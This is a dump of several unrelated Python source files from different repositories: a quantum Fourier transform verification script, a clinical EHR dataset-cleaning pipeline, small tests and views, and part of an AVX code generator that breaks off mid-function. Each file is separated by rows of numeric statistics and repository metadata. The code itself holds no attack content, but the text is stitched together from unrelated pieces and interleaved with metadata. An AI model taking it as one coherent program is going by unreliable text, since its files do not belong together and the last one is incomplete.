| 45.704918 | 88 | 0.720947 | 708 | 5,576 | 5.358757 | 0.148305 | 0.063258 | 0.053769 | 0.063258 | 0.85398 | 0.843437 | 0.833421 | 0.811281 | 0.792304 | 0.792304 | 0 | 0.014187 | 0.16571 | 5,576 | 121 | 89 | 46.082645 | 0.801376 | 0.064383 | 0 | 0.494382 | 0 | 0 | 0.071799 | 0.009791 | 0 | 0 | 0 | 0 | 0.179775 | 1 | 0.191011 | false | 0 | 0.067416 | 0.011236 | 0.303371 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3606ce17e9008136870cd62acc9a721583fe384f | 10,038 | py | Python | experiment_qft.py | fabianbauermarquart/quavl | 5e0a685912c2f914a9a3581ce65d76f3b05f7261 | [
"MIT"
] | null | null | null | experiment_qft.py | fabianbauermarquart/quavl | 5e0a685912c2f914a9a3581ce65d76f3b05f7261 | [
"MIT"
] | null | null | null | experiment_qft.py | fabianbauermarquart/quavl | 5e0a685912c2f914a9a3581ce65d76f3b05f7261 | [
"MIT"
] | null | null | null | from typing import List
import numpy as np
from z3 import If, Or, Not, And
from quavl.lib.constants import cos, sin, pi
from quavl.lib.expressions.complex import ComplexVal
from quavl.lib.expressions.qbit import Qbits, QbitVal
from quavl.lib.models.circuit import Circuit, Method
from quavl.lib.operations.gates import H, R, SWAP, Rx, Rz
from quavl.lib.solver import SpecificationType
def build_qft_specification(qbits: List[QbitVal]):
"""
Build specification for QFT.
:param qbits: qbits.
:return: specification.
"""
n = len(qbits)
output_bit_values = [If(q.beta.r == 1.0, 1.0, 0.0) for q in qbits]
output_bit_fractions = []
for i in range(n):
output_bit_fraction = 0.0
for j, k in enumerate(range(i, n)):
output_bit_fraction += output_bit_values[k] * (1 / (2 ** (j + 1)))
output_bit_fractions.append(output_bit_fraction)
inv_root2 = 1 / np.sqrt(2) # inv_root2 = 1 / Sqrt(Real(2))
output_specification = [QbitVal(
alpha=ComplexVal(r=inv_root2),
beta=ComplexVal(r=inv_root2 * cos(2 * pi * v),
i=inv_root2 * sin(2 * pi * v)))
for v in output_bit_fractions]
return output_specification
def prove_qft():
"""
Correctness proof of the QFT.
"""
# Initialize circuit
q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
n = 3
circuit = Circuit([q0, q1, q2],
[
H(q0),
R(q0, 2).controlled_by(q1),
R(q0, 3).controlled_by(q2),
H(q1),
R(q1, 2).controlled_by(q2),
H(q2),
SWAP(q0, q2)
])
initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
circuit.initialize_qbits(initial_values)
# Build specification
final_qbits = circuit.get_final_qbits()
spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
output_specification = build_qft_specification(circuit.qbits)
conjunction = []
for i in range(n):
conjunction.append(spec_qbits[i] == output_specification[i])
circuit.solver.add(And(conjunction))
circuit.final_qbits += spec_qbits
# Set specification
circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
SpecificationType.equality_pair_list)
# Prove and repair
circuit.prove(method=Method.qbit_sequence_model,
dump_smt_encoding=True,
dump_solver_output=True,
synthesize_repair=True)
def repair_phase_error_qft():
"""
Repair of a faulty QFT where a gate is omitted.
"""
# Initialize circuit
q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
n = 3
circuit = Circuit([q0, q1, q2],
[
H(q0),
R(q0, 2).controlled_by(q1),
R(q0, 3).controlled_by(q2),
H(q1),
R(q1, 2).controlled_by(q2),
H(q2),
SWAP(q0, q2)
])
initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
circuit.initialize_qbits(initial_values)
# Build specification
final_qbits = circuit.get_final_qbits()
spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
output_specification = build_qft_specification(circuit.qbits)
conjunction = []
for i in range(n):
conjunction.append(spec_qbits[i] == output_specification[i])
circuit.solver.add(And(conjunction))
circuit.final_qbits += spec_qbits
# Set specification
circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
SpecificationType.equality_pair_list)
# Prove and repair
circuit.prove(method=Method.qbit_sequence_model,
dump_smt_encoding=True,
dump_solver_output=True,
synthesize_repair=True,
entangling_repair=True)
def repair_omission_qft():
"""
Repair of a faulty QFT where a gate is omitted.
"""
# Initialize circuit
q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
n = 3
circuit = Circuit([q0, q1, q2],
[
R(q0, 2).controlled_by(q1),
R(q0, 3).controlled_by(q2),
H(q1),
R(q1, 2).controlled_by(q2),
H(q2),
SWAP(q0, q2)
])
initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
circuit.initialize_qbits(initial_values)
# Build specification
final_qbits = circuit.get_final_qbits()
spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
output_specification = build_qft_specification(circuit.qbits)
conjunction = []
for i in range(n):
conjunction.append(spec_qbits[i] == output_specification[i])
circuit.solver.add(And(conjunction))
circuit.final_qbits += spec_qbits
# Set specification
circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
SpecificationType.equality_pair_list)
# Prove and repair
circuit.prove(method=Method.qbit_sequence_model,
dump_smt_encoding=True,
dump_solver_output=True,
synthesize_repair=True,
entangling_repair=True,
entangling_gate_index=0)
def prove_repaired_qft_phase_error():
"""
Prove the correctness of the repaired QFT with phase error.
:return:
"""
# Initialize circuit
q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
n = 3
# repair outcome: rotation, [-0.1, 0.1]
rep_theta_0 = [0.0140625, 0.014062500000000002]
rep_phi_0 = [-0.014062500000000002, -0.0140625]
rep_theta_1 = [0.0140625, 0.014062500000000002]
rep_phi_1 = [-0.014062500000000002, -0.0140625]
rep_theta_2 = [0.0140625, 0.014062500000000002]
rep_phi_2 = [-0.014062500000000002, -0.0140625]
circuit = Circuit([q0, q1, q2],
[
H(q0),
R(q0, 2).controlled_by(q1),
R(q0, 3).controlled_by(q2),
H(q1),
R(q1, 2).controlled_by(q2),
H(q2),
SWAP(q0, q2),
Rx(q0, np.mean(rep_theta_0)),
Rz(q0, np.mean(rep_phi_0)),
Rx(q1, np.mean(rep_theta_1)),
Rz(q1, np.mean(rep_phi_1)),
Rx(q2, np.mean(rep_theta_2)),
Rz(q2, np.mean(rep_phi_2))
])
initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
circuit.initialize_qbits(initial_values)
# Build specification
final_qbits = circuit.get_final_qbits()
spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
output_specification = build_qft_specification(circuit.qbits)
disjunction = []
for i in range(n):
disjunction.append(Not(spec_qbits[i] == output_specification[i]))
circuit.solver.add(Or(disjunction))
circuit.final_qbits += spec_qbits
# Set specification
circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
SpecificationType.equality_pair_list)
# Prove and repair
circuit.prove(method=Method.qbit_sequence_model,
dump_smt_encoding=True,
dump_solver_output=True)
def prove_repaired_qft_rotation_large_interval():
"""
Prove the correctness of the repaired QFT with the large interval rotation.
:return:
"""
# Initialize circuit
q0, q1, q2 = Qbits(['q0', 'q1', 'q2'])
n = 3
rep_theta_0 = [1.9148873922774943, 1.9148873922774945]
rep_phi_0 = [-1.9148873922774945, -1.9148873922774943]
rep_theta_1 = [1.9148873922774943, 1.9148873922774945]
rep_phi_1= [-1.9148873922774945, -1.9148873922774943]
rep_theta_2 = [1.9148873922774943, 1.9148873922774945]
rep_phi_2 = [-1.9148873922774945, -1.9148873922774943]
circuit = Circuit([q0, q1, q2],
[
R(q0, 2).controlled_by(q1),
R(q0, 3).controlled_by(q2),
H(q1),
R(q1, 2).controlled_by(q2),
H(q2),
SWAP(q0, q2),
Rx(q0, np.mean(rep_theta_0)),
Rz(q0, np.mean(rep_phi_0)),
Rx(q1, np.mean(rep_theta_1)),
Rz(q1, np.mean(rep_phi_1)),
Rx(q2, np.mean(rep_theta_2)),
Rz(q2, np.mean(rep_phi_2))
])
initial_values = [{(1, 0), (0, 1)} for _ in range(n)]
circuit.initialize_qbits(initial_values)
# Build specification
final_qbits = circuit.get_final_qbits()
spec_qbits = Qbits([f'spec_q{i}' for i in range(n)])
output_specification = build_qft_specification(circuit.qbits)
disjunction = []
for i in range(n):
disjunction.append(Not(spec_qbits[i] == output_specification[i]))
circuit.solver.add(Or(disjunction))
circuit.final_qbits += spec_qbits
# Set specification
circuit.set_specification([(final_qbits[i], spec_qbits[i]) for i in range(n)],
SpecificationType.equality_pair_list)
# Prove and repair
circuit.prove(method=Method.qbit_sequence_model,
dump_smt_encoding=True,
dump_solver_output=True)
if __name__ == "__main__":
prove_qft()
repair_phase_error_qft()
repair_phase_error_qft()
prove_repaired_qft_phase_error()
prove_repaired_qft_rotation_large_interval()
| 30.603659 | 82 | 0.555888 | 1,208 | 10,038 | 4.396523 | 0.104305 | 0.027678 | 0.031632 | 0.033139 | 0.809264 | 0.798531 | 0.701186 | 0.701186 | 0.6865 | 0.6865 | 0 | 0.08465 | 0.33154 | 10,038 | 327 | 83 | 30.697248 | 0.706855 | 0.0789 | 0 | 0.728643 | 0 | 0 | 0.009103 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030151 | false | 0 | 0.045226 | 0 | 0.080402 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3699ffecbe9c5b48345e8857ba5e05e711ef26fd | 94 | py | Python | tests/test_events.py | stlk/pyworking.cz | 13fd0a21c498b1589cd4b1fc3f2d908fe06b2970 | [
"MIT"
] | 5 | 2017-08-26T11:53:37.000Z | 2017-12-13T20:50:18.000Z | tests/test_events.py | stlk/pyworking.cz | 13fd0a21c498b1589cd4b1fc3f2d908fe06b2970 | [
"MIT"
] | 40 | 2017-08-27T20:34:43.000Z | 2020-08-31T09:45:02.000Z | tests/test_events.py | stlk/pyworking.cz | 13fd0a21c498b1589cd4b1fc3f2d908fe06b2970 | [
"MIT"
] | 15 | 2017-08-26T11:55:16.000Z | 2021-08-21T09:35:55.000Z | from pyworking_cz.model import load_events
def test_load_events():
assert load_events()
| 15.666667 | 42 | 0.787234 | 14 | 94 | 4.928571 | 0.714286 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148936 | 94 | 5 | 43 | 18.8 | 0.8625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
3d4780d9ba9915f207b24c2f63469d28160f40f1 | 9,810 | py | Python | data_steward/cdr_cleaner/clean_cdr.py | berneskaracay/curation | 713e8ac606822a6f639ed3a74c9c0c07ba19f7c0 | [
"MIT"
] | null | null | null | data_steward/cdr_cleaner/clean_cdr.py | berneskaracay/curation | 713e8ac606822a6f639ed3a74c9c0c07ba19f7c0 | [
"MIT"
] | null | null | null | data_steward/cdr_cleaner/clean_cdr.py | berneskaracay/curation | 713e8ac606822a6f639ed3a74c9c0c07ba19f7c0 | [
"MIT"
] | null | null | null | """
A module to serve as the entry point to the cdr_cleaner package.
It gathers the list of query strings to execute and sends them
to the query engine.
"""
# Python imports
import logging
# Third party imports
from google.appengine.api import app_identity
# Project imports
import bq_utils
import constants.cdr_cleaner.clean_cdr as clean_cdr_consts
import cdr_cleaner.clean_cdr_engine as clean_engine
# cleaning rule imports
import cdr_cleaner.cleaning_rules.clean_years as clean_years
import cdr_cleaner.cleaning_rules.id_deduplicate as id_dedup
import cdr_cleaner.cleaning_rules.negative_ages as neg_ages
import cdr_cleaner.cleaning_rules.no_data_30_days_after_death as no_data_30days_after_death
import cdr_cleaner.cleaning_rules.null_invalid_foreign_keys as null_foreign_key
import cdr_cleaner.cleaning_rules.person_id_validator as person_validator
import cdr_cleaner.cleaning_rules.temporal_consistency as bad_end_dates
import cdr_cleaner.cleaning_rules.valid_death_dates as valid_death_dates
import cdr_cleaner.cleaning_rules.drug_refills_days_supply as drug_refills_supply
LOGGER = logging.getLogger(__name__)
def _gather_ehr_queries(project_id, dataset_id):
"""
gathers all the queries required to clean ehr dataset
:param project_id: project name
:param dataset_id: ehr dataset name
:return: returns list of queries
"""
query_list = []
query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
return query_list
def _gather_rdr_queries(project_id, dataset_id):
"""
gathers all the queries required to clean rdr dataset
:param project_id: project name
:param dataset_id: rdr dataset name
:return: returns list of queries
"""
query_list = []
query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
return query_list
def _gather_ehr_rdr_queries(project_id, dataset_id):
"""
gathers all the queries required to clean ehr_rdr dataset
:param project_id: project name
:param dataset_id: ehr_rdr dataset name
:return: returns list of queries
"""
query_list = []
query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
query_list.extend(null_foreign_key.null_invalid_foreign_keys(project_id, dataset_id))
query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
query_list.extend(no_data_30days_after_death.no_data_30_days_after_death(project_id, dataset_id))
query_list.extend(valid_death_dates.get_valid_death_date_queries(project_id, dataset_id))
query_list.extend(drug_refills_supply.get_days_supply_refills_queries(project_id, dataset_id))
return query_list
def _gather_ehr_rdr_de_identified_queries(project_id, dataset_id):
"""
gathers all the queries required to clean de_identified dataset
:param project_id: project name
:param dataset_id: de_identified dataset name
:return: returns list of queries
"""
query_list = []
query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
query_list.extend(person_validator.get_person_id_validation_queries(project_id, dataset_id))
query_list.extend(valid_death_dates.get_valid_death_date_queries(project_id, dataset_id))
query_list.extend(drug_refills_supply.get_days_supply_refills_queries(project_id, dataset_id))
return query_list
def _gather_unioned_ehr_queries(project_id, dataset_id):
"""
gathers all the queries required to clean unioned_ehr dataset
:param project_id: project name
:param dataset_id: unioned_ehr dataset name
:return: returns list of queries
"""
query_list = []
query_list.extend(id_dedup.get_id_deduplicate_queries(project_id, dataset_id))
query_list.extend(clean_years.get_year_of_birth_queries(project_id, dataset_id))
query_list.extend(neg_ages.get_negative_ages_queries(project_id, dataset_id))
query_list.extend(bad_end_dates.get_bad_end_date_queries(project_id, dataset_id))
query_list.extend(valid_death_dates.get_valid_death_date_queries(project_id, dataset_id))
query_list.extend(drug_refills_supply.get_days_supply_refills_queries(project_id, dataset_id))
return query_list
def clean_rdr_dataset(project_id=None, dataset_id=None):
"""
Run all clean rules defined for the rdr dataset.
:param project_id: Name of the BigQuery project.
:param dataset_id: Name of the dataset to clean
"""
if dataset_id is None or dataset_id == '' or dataset_id.isspace():
dataset_id = bq_utils.get_rdr_dataset_id()
LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)
query_list = _gather_rdr_queries(project_id, dataset_id)
LOGGER.info("Cleaning rdr_dataset")
clean_engine.clean_dataset(project_id, dataset_id, query_list)
def clean_ehr_dataset(project_id=None, dataset_id=None):
"""
Run all clean rules defined for the ehr dataset.
:param project_id: Name of the BigQuery project.
:param dataset_id: Name of the dataset to clean
"""
if dataset_id is None or dataset_id == '' or dataset_id.isspace():
dataset_id = bq_utils.get_dataset_id()
LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)
query_list = _gather_ehr_queries(project_id, dataset_id)
LOGGER.info("Cleaning ehr_dataset")
clean_engine.clean_dataset(project_id, dataset_id, query_list)
def clean_unioned_ehr_dataset(project_id=None, dataset_id=None):
"""
Run all clean rules defined for the unioned ehr dataset.
:param project_id: Name of the BigQuery project.
:param dataset_id: Name of the dataset to clean
"""
if dataset_id is None or dataset_id == '' or dataset_id.isspace():
dataset_id = bq_utils.get_unioned_dataset_id()
LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)
query_list = _gather_unioned_ehr_queries(project_id, dataset_id)
LOGGER.info("Cleaning unioned_dataset")
clean_engine.clean_dataset(project_id, dataset_id, query_list)
def clean_ehr_rdr_dataset(project_id=None, dataset_id=None):
"""
Run all clean rules defined for the ehr and rdr dataset.
:param project_id: Name of the BigQuery project.
:param dataset_id: Name of the dataset to clean
"""
if dataset_id is None or dataset_id == '' or dataset_id.isspace():
dataset_id = bq_utils.get_ehr_rdr_dataset_id()
LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)
query_list = _gather_ehr_rdr_queries(project_id, dataset_id)
LOGGER.info("Cleaning ehr_rdr_dataset")
clean_engine.clean_dataset(project_id, dataset_id, query_list)
def clean_ehr_rdr_de_identified_dataset(project_id=None, dataset_id=None):
"""
Run all clean rules defined for the deidentified ehr and rdr dataset.
:param project_id: Name of the BigQuery project.
:param dataset_id: Name of the dataset to clean
"""
if dataset_id is None or dataset_id == '' or dataset_id.isspace():
dataset_id = bq_utils.get_combined_deid_dataset_id()
LOGGER.info('Dataset is unspecified. Using default value of:\t%s', dataset_id)
query_list = _gather_ehr_rdr_de_identified_queries(project_id, dataset_id)
LOGGER.info("Cleaning de-identified dataset")
clean_engine.clean_dataset(project_id, dataset_id, query_list)
def get_dataset_and_project_names():
"""
Get project and dataset names from environment variables.
:return: A dictionary of dataset names and project name
"""
project_and_dataset_names = dict()
project_and_dataset_names[clean_cdr_consts.EHR_DATASET] = bq_utils.get_dataset_id()
project_and_dataset_names[clean_cdr_consts.UNIONED_EHR_DATASET] = bq_utils.get_unioned_dataset_id()
project_and_dataset_names[clean_cdr_consts.RDR_DATASET] = bq_utils.get_rdr_dataset_id()
project_and_dataset_names[clean_cdr_consts.EHR_RDR_DATASET] = bq_utils.get_ehr_rdr_dataset_id()
project_and_dataset_names[clean_cdr_consts.EHR_RDR_DE_IDENTIFIED] = bq_utils.get_combined_deid_dataset_id()
project_and_dataset_names[clean_cdr_consts.PROJECT] = app_identity.get_application_id()
return project_and_dataset_names
def clean_all_cdr():
"""
Runs cleaning rules on all the datasets
"""
id_dict = get_dataset_and_project_names()
project = id_dict[clean_cdr_consts.PROJECT]
clean_ehr_dataset(project, id_dict[clean_cdr_consts.EHR_DATASET])
clean_unioned_ehr_dataset(project, id_dict[clean_cdr_consts.UNIONED_EHR_DATASET])
clean_rdr_dataset(project, id_dict[clean_cdr_consts.RDR_DATASET])
clean_ehr_rdr_dataset(project, id_dict[clean_cdr_consts.EHR_RDR_DATASET])
clean_ehr_rdr_de_identified_dataset(
project, id_dict[clean_cdr_consts.EHR_RDR_DE_IDENTIFIED]
)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-s', action='store_true', help='Send logs to console')
args = parser.parse_args()
clean_engine.add_console_logging(args.s)
clean_all_cdr()
| 39.878049 | 111 | 0.780428 | 1,484 | 9,810 | 4.740566 | 0.093666 | 0.116418 | 0.093248 | 0.104904 | 0.837242 | 0.786638 | 0.749396 | 0.738024 | 0.706326 | 0.64307 | 0 | 0.000955 | 0.145872 | 9,810 | 245 | 112 | 40.040816 | 0.838644 | 0.202243 | 0 | 0.410256 | 0 | 0 | 0.055504 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102564 | false | 0 | 0.128205 | 0 | 0.282051 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e9eb206fcf121820e86df3221d0d56162c417861 | 28 | py | Python | main.py | Baldwin90/thenewboston-python-client | cfefc4dc7a401f9e055fde16e56100d41539fd69 | [
"MIT"
] | null | null | null | main.py | Baldwin90/thenewboston-python-client | cfefc4dc7a401f9e055fde16e56100d41539fd69 | [
"MIT"
] | null | null | null | main.py | Baldwin90/thenewboston-python-client | cfefc4dc7a401f9e055fde16e56100d41539fd69 | [
"MIT"
] | null | null | null | print('Hello cruel world.')
| 14 | 27 | 0.714286 | 4 | 28 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 28 | 1 | 28 | 28 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
18204d922c0ee98d8b0d7aea50a4b7b80092dbef | 109 | py | Python | f_monthpython/f_monthpython/views.py | koffi09/Parissssportif | 0ca2a57c27f15ffb389dbd350f0bb746751f2639 | [
"Apache-2.0"
] | null | null | null | f_monthpython/f_monthpython/views.py | koffi09/Parissssportif | 0ca2a57c27f15ffb389dbd350f0bb746751f2639 | [
"Apache-2.0"
] | null | null | null | f_monthpython/f_monthpython/views.py | koffi09/Parissssportif | 0ca2a57c27f15ffb389dbd350f0bb746751f2639 | [
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
def home(request):
return render (request,'home.html')
| 12.111111 | 41 | 0.66055 | 13 | 109 | 5.538462 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.247706 | 109 | 8 | 42 | 13.625 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.092784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
182e45162e0fd0bd2656b99406de9e9ec25f4b9a | 40 | py | Python | contrib/action_recognition/r2p1d/vu/utils/__init__.py | revodavid/ComputerVision | e705e2a154cb63245e03dffb5a97c284e0897aee | [
"MIT"
] | 2 | 2020-11-12T20:40:22.000Z | 2022-03-20T18:08:15.000Z | contrib/action_recognition/r2p1d/vu/utils/__init__.py | revodavid/ComputerVision | e705e2a154cb63245e03dffb5a97c284e0897aee | [
"MIT"
] | null | null | null | contrib/action_recognition/r2p1d/vu/utils/__init__.py | revodavid/ComputerVision | e705e2a154cb63245e03dffb5a97c284e0897aee | [
"MIT"
] | 5 | 2020-04-09T17:56:47.000Z | 2021-04-26T14:22:57.000Z | from .common import Config, system_info
| 20 | 39 | 0.825 | 6 | 40 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 40 | 1 | 40 | 40 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
18642ee07d3da0c1485a050c5051d46cc87c693f | 120 | py | Python | openpecha/catalog/utils.py | ta4tsering/openpecha-toolkit | ff24b4813fb8146a4327e746e4024890b6807bea | [
"Apache-2.0"
] | 1 | 2021-12-08T04:47:40.000Z | 2021-12-08T04:47:40.000Z | openpecha/catalog/utils.py | ta4tsering/openpecha-toolkit | ff24b4813fb8146a4327e746e4024890b6807bea | [
"Apache-2.0"
] | 38 | 2019-11-12T10:49:25.000Z | 2021-04-07T12:10:24.000Z | openpecha/catalog/utils.py | OpenPecha/openpecha | 73359686e2b3a703c6018aecbffe7adb4f485c88 | [
"Apache-2.0"
] | 6 | 2021-08-30T04:02:15.000Z | 2021-12-27T03:39:41.000Z | from openpecha.config import N_SIG, PECHA_PREFIX
def create_pecha_id(num):
return f"{PECHA_PREFIX}{num:0{N_SIG}}"
| 20 | 48 | 0.758333 | 21 | 120 | 4.047619 | 0.714286 | 0.094118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 0.125 | 120 | 5 | 49 | 24 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.233333 | 0.233333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
a120bf348723fe226b222ac94eb040d1e909c9da | 172,412 | py | Python | slingen/src/isas/avx.py | danielesgit/slingen | e7cfee7f6f2347b57eb61a077746c9309a85411c | [
"BSD-3-Clause"
] | 23 | 2018-03-13T07:52:26.000Z | 2022-03-24T02:32:00.000Z | slingen/src/isas/avx.py | danielesgit/slingen | e7cfee7f6f2347b57eb61a077746c9309a85411c | [
"BSD-3-Clause"
] | 2 | 2018-09-28T18:29:25.000Z | 2019-02-20T13:22:19.000Z | slingen/src/isas/avx.py | danielesgit/slingen | e7cfee7f6f2347b57eb61a077746c9309a85411c | [
"BSD-3-Clause"
] | 3 | 2018-06-13T13:51:57.000Z | 2020-01-11T14:47:02.000Z | '''
Created on Apr 18, 2012
@author: danieles
'''
import sys
from sympy import sympify
from islpy import Set, Map
from src.dsls.ll import Matrix, ZeroMatrix, Symmetric, LowerTriangular, UpperTriangular, LowerUnitTriangular, UpperUnitTriangular, IdentityMatrix, AllEntriesConstantMatrix
from src.binding import getReference, ScalarsReference
from src.irbase import RValue, Pointer, VecAccess, VecDest, MovStatement, Mov, Comment, AddressOf, sa, V, DebugPrint, icode
from src.isas.isabase import ISA, Loader, Storer, LoadReplacer
from src.isas.sse2 import mmLoadSd, mmStoreSd, mmDivPd, mmSqrtPd
# from src.isas.sse4_1 import SSE4_1, SSSE3, SSE3, SSE2, SSE, x86
# from src.isas.isabase import *
# from src.isas.x86 import *
# from src.isas.sse import *
# from src.isas.sse2 import *
# from src.isas.sse3 import *
# from src.isas.ssse3 import *
# from src.isas.sse4_1 import *
class mm256LoadGs(RValue, VecAccess):
''' Wrapper of a vector load instruction.
Useful when we want to represent a composite load instruction as a single logical instruction and then have it
easily replaced by a scalar during scalar replacement.
'''
def __init__(self, pointer, mrmap, isCompact=True, isCorner=False, horizontal=True, zeromask=[]):
super(mm256LoadGs, self).__init__()
self.pointer = pointer
self.mrmap = mrmap
self.isCompact = isCompact
self.isCorner = isCorner
self.horizontal = horizontal
self.orientation = 'horizontal' if horizontal else 'vertical'
self.zeromask = zeromask
self.reglen = 8
self.analysis = None
self._content = None
@property
def content(self):
if self._content == None:
self._content = self.generateContent()
return self._content
def generateContent(self):
mrmap = self.mrmap
pointer = self.pointer
zeromask = self.zeromask
horizontal = self.horizontal
isCompact = self.isCompact
content = None
if len(mrmap) == 1:
if mrmap == [tuple(range(self.reglen))]:
content = mm256BroadcastSs(pointer, zeromask)
# if mrmap[0] == 0:
else:
vmask = self.reglen*[0]
vmask[mrmap[0]] = 1
maskPtr = pointer if isinstance(pointer.ref, ScalarsReference) else Pointer((pointer.mat, (pointer.at[0], pointer.at[1] - mrmap[0])))
content = mm256MaskloadPs(maskPtr, vmask, zeromask)
# else:
# zm_i = [0] if mrmap[0] in zeromask else []
# ei = mmLoadSs(pointer, zm_i)
# pos = 4*[1]
# pos[mrmap[0]] = 0
# pos.reverse()
# content = mmShufflePs(ei, ei, tuple(pos))
# elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
elif mrmap == range(len(mrmap)):
l = len(mrmap)
if isCompact or horizontal:
if l == self.reglen:
content = mm256LoaduPs(pointer, zeromask)
else:
vmask = self.reglen*[0]
vmask[:l] = l*[1]
content = mm256MaskloadPs(pointer, vmask, zeromask)
else: # Incompact case should appear only if vertical
vmask = [1] + 7*[0]
